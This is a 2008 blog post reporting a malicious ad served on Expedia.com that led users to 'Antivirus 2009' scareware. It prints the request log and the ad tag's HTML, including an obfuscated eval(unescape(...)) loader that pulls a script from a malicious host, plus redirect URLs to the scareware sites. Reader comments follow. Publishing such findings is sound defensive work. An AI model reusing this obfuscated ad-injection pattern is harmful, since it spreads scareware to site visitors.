Notice: This blog is no longer updated. You may find a broken link or two

You can follow my new adventures @mikeonwine

Malvertisement on Expedia.com

November 23rd, 2008

Kudos to Andrew Dilling who sent me the full logs of this last night. I don’t have a contact @ Expedia but if someone does please shoot them a note.

Screenshot:

The popup:

Antivirus 2009 Download Page:

Tamper Data:

Calls:

GET http://www.expedia.com/
GET http://www.prolinar.com/?id=200811181921042
GET http://vernariostar.com/?id=200811181921042
GET http://www.google-analytics.com/ga.js
GET http://www.google-analytics.com/__utm.gif?utmwv[...]

http://vernariostar.com/includes.js

POST http://clicksoverview.com/soft.php?aid=075675&d=1&product=XPA&refer=dc77b3921
GET http://antivirusdefense.com/2009/1/freescan.php?nu=77075675

Code of the Ad tag page:

<html><body style="margin:0; padding:0;">
<a href="http://www.rhapsody.com/?ref=26ta7" target="_blank"><img src="http://www.triesto.com/banners-db/Rhapsody/Rhapsody_728x90_1.jpg" border=0></a>

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));

</script>
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-6195944-3");
pageTracker._trackPageview();
</script>

<script>
var action_URL = "http://clicksoverview.com/soft.php?aid=075675&d=1&product=XPA&refer=dc77b3921";
var target_URL = "http://clicksoverview.com/soft.php?aid=075675&d=1&product=XPA&refer=dc77b3921";
var warn_prod = "";
eval(unescape(‘%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%76%65%72%6E%61%72%69%6F%73%74%61%72%2E%63%6F%6D%2F%69%6E%63%6C%75%64%65%73%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B’));

</script>

</body></html>

Related Posts:


Posted by Mike Filed in malvertising
5 Comments »

  • http://msmvps.com/spywaresucks Sandi Hardmeier

    I’ve got a contact – can you send me the logs Mike?

    Sandi

  • Jeff E

    This same ad was on Billboard.com on Friday.

  • http://rubiconproject.com Kara Weber

    Ad quality is the biggest risk to our industry, and this is a perfect example.

    the Rubicon Project estimates that the absence of an across-the-board solution to filter unwanted ads can put up to 30% of publishers’ ad revenue at risk. Unwanted ads damage publishers’ brand value and reputation by creating a negative user experience – driving away site visitors and the revenue they bring; de-valuing ad rates, which handicaps sales teams’ ability to sell at rate card prices; and alienating premium advertisers whose quality creative can be degraded by placement next to an offending ad.

    To spare publishers this headache, we launched the Ad Quality Protection Program a few weeks ago (http://tiny.cc/r4j98). If the rest of industry doesn’t tackle this issue head-on, all the benefits of online advertising we’ve been touting along the way – direct accountability, measurability, etc. – are for naught.

  • http://www.mikeonads.com/ Mike

    That sounds very nice, although fundamentally does little to solve the root of the problem — unless you actually start publishing your findings. By publishing I don’t mean touting “20,000 creatives stopped”, but I mean posting screencaps and links of all the offending ads you have found so that the only show up once on one network, and not 100 times on 100 networks. You guys have the resources to turn this into a community effort, and I hope you do so.

    -Mike

  • http://www.victimsofexpedia.com John

    Expedia is a scam. Clik on my name to read evidence of how they are scamming people.